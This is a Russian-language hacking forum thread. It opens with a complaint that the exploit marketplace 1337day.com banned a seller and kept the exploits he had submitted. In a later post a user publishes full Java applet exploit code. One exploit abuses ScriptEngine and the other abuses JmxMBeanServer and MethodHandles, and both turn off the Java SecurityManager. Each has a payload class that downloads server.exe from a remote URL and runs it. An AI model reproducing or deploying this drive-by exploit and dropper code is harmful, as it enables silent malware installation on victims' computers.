Кидала 1337day.com сервис

Всем привет! Хочу рассказать так как реально не нашел до этого не каких отзывов о этом сервисе и выложил 5 материалов за скромную цену что сейчас там за цена не знаю.
2014-02-17 Java 6 Update 27 Download and Execute Vulnerability
2014-02-17 Java 7 Update 11 vulnerability to download and execute
2014-02-17 Java 7 Update 5-10 vulnerability to download and execute
2014-02-15 Microsoft Office 2007/2010 Download and Execute Vulnerability
2014-02-15 Mozilla Firefox 5-15 vulnerability Download and Execute
Вот мой материал. Админ сервиса похоже вообще не соображает в этом так как сказал публиковать каждую неделю по 3-5 эксп. Кто соображает поймет что это не реально и бывает на создание одного уходит по 2-3 месяца а бывает находишь решение в течении двух дней как получилось с этим 2014-02-15 Mozilla Firefox 5-15 vulnerability Download and Execute или этот Microsoft Office 2007/2010 Download and Execute Vulnerability я сделал за два дня . Ну естественно я ему сказал что это нереально и буквально через неделю зашел посмотреть свой баланс был приятно удивлен, у меня бан. Без объяснения причин. Самая прелесть того что ты весь материал даешь на проверку и естественно они могут им барыжить.Так что надеюсь что правда разойдется по инету о этом дырявом сервисе.

 

После постов о продаже воздуха с 1337day, вы доверяете им?

 

Мне жаль что я не видел этих постов.........

 

Их даже ломали из-за этого.
http://forum.antichat.ru/thread383601.html

 

Они на связь не выходят, пишу удалить мой материал в ответ игнор полный, не зря похоже они под ддосом постоянно

 

Участвуйте в конкурсах на данном форуме, получите и деньги и славу одновременно.

 

Ну раз ушли эксплойты неизвестно куда - поделись.

 

сплойты в паблик епту

 

Если покупал только ради этой статьи - то зря потратился.
http://n3tw0rk.ru/1337.pdf

 

Умерь свой пыл.

 

Capricious, соучредитель 1337day.com?
А по факту с ТС согласен. Всё что касается денежного оборота внутри сервиса, очень не надежно. Помню как продавали сплоит под воблу за 5к. В итоге пару кидков и ничего подобного там не оказалось.
Но стоит ему отдать должное. Один из лучших в своей области.

 

А ты сам то не с сервиса случаем?

 

Два выложу на остальные спрос большой

Code:

import java.applet.Applet;
import javax.script.Bindings;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;
import javax.swing.JList;


public class Exploit1
  extends Applet
{
  public void init()
  {
    try
    {
      ScriptEngine localScriptEngine = new ScriptEngineManager().getEngineByName("js");
      Bindings localBindings = localScriptEngine.createBindings();
      localBindings.put("applet", this);
      



      Object localObject = localScriptEngine.eval("this.toString = function() {\tjava.lang.System.setSecurityManager(null);\tapplet.callBack();\treturn String.fromCharCode(97 + Math.round(Math.random() * 25));};e = new Error();e.message = this;e", localBindings);
   
import java.io.DataInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.PrintStream;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLConnection;

public class Payload
{
  public static void main(String[] args)
  {
    try
    {
      URL url = new URL("http:///server.exe");
      URLConnection a = url.openConnection();
      DataInputStream b = new DataInputStream(a.getInputStream());
      byte[] fileData = new byte[a.getContentLength()];
      for (int i = 0; i < fileData.length; i++) {
        fileData[i] = b.readByte();
      }
      b.close();
      FileOutputStream c = new FileOutputStream(new File("C:\\Users\\Public\\server.exe"));
      c.write(fileData);
      c.close();
      new ProcessBuilder(new String[] { "C:\\Users\\Public\\server.exe" }).start();
    }
    catch (MalformedURLException m)
    {
      System.out.println();
    }
    catch (IOException e)
    {
      System.out.println(e);
    }
  }
}
   

Code:

import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.applet.Applet;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodHandles.Lookup;
import java.lang.invoke.MethodType;

public class Exp1Win7
  extends Applet
{
  public void init()
  {
    try
    {
      ByteArrayOutputStream localByteArrayOutputStream = new ByteArrayOutputStream();
      byte[] arrayOfByte = new byte[8192];
      
      InputStream localInputStream = getClass().getResourceAsStream("B.class");
      int i;
      while ((i = localInputStream.read(arrayOfByte)) > 0) {
        localByteArrayOutputStream.write(arrayOfByte, 0, i);
      }
      arrayOfByte = localByteArrayOutputStream.toByteArray();
      
      JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
      JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
      MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
      ClassLoader localClassLoader = null;
      Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", localClassLoader);
      Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", localClassLoader);
      MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
      MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
      MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
      MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
      MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
      Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
      MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
      MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
      MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
      MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
      Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
      MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { new byte[0].getClass() });
      MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2, "defineClass", localMethodType5 });
      Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });
      localClass3.newInstance();
      
      bxoUpJL.main(null);
    }
    catch (Throwable localThrowable) {}
  }
}
import java.io.File;
import java.io.FileOutputStream;
import java.io.PrintStream;
import java.net.URL;
import java.nio.channels.Channels;
import java.nio.channels.FileChannel;
import java.nio.channels.ReadableByteChannel;

public class bxoUpJL
{
  public void urlDownload(URL FromUrl, File ToFile)
    throws Exception
  {
    ReadableByteChannel bc = Channels.newChannel(FromUrl.openStream());
    FileChannel fc = new FileOutputStream(ToFile).getChannel();
    
    int pos = 0;
    int transferunit = 1024;
    int len;
    while ((len = (int)fc.transferFrom(bc, pos, transferunit)) == transferunit)
    {
      System.out.println("Zachital");
      pos += len;
    }
    System.out.println("Gotovo!");
    bc.close();
    fc.close();
  }
  
  public static void main(String[] args)
  {
    bxoUpJL HDwler = new bxoUpJL();
    try
    {
      HDwler.urlDownload(new URL("http:///server.exe"), new File("C:\\Users\\Public\\server.exe"));
      Runtime.getRuntime().exec("C:\\Users\\Public\\server.exe");
    }
    catch (Exception e)
    {
      System.out.println("");
    }
  }
}
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

public class B
  implements PrivilegedExceptionAction
{
  public B()
  {
    try
    {
      AccessController.doPrivileged(this);
    }
    catch (Exception localException) {}
  }
  
  public Object run()
  {
    System.setSecurityManager(null);
    return new Object();
  }
}

 

Я хотел принять участие в прошлом конкурсе но мою тему удалили про эксп и видео а отправлять те же видео на конкурс нерационально.

 

Группа медицинских экспертов во главе с kastin удалила у посетителя форума #256723 нечто. Из одного места - того, что пониже спины.

 

Вот бы кто и мне такую удалил а то ходить мешает